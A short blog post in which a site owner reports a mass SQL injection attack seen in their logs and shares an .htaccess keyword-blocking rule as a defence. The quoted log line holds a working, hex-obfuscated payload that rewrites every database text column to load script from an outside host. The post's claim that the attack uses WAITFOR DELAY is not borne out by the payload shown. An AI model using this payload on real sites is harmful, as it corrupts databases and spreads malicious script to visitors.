Blog SQL injection attack

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 – – [02/Oct/2008:05:57:15 -0400] “GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1” 200 42469 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)”

Turns out its a SQL injection attack which is allegedly being carried out by a criminal gang called Rock Phish (or its being carried out by two teenagers pretending to be a “gang”). The attack uses WAITFOR DELAY to see if it worked or not. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I’ve been blocking the IP when it comes up, but that becomes impractical after a while.

I found a few solutions on this Webmasterworld thread. This can be put in the .htaccess file:

RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC]
RewriteRule (.*) – [F,L]

I’ll be doing that today for all my sites.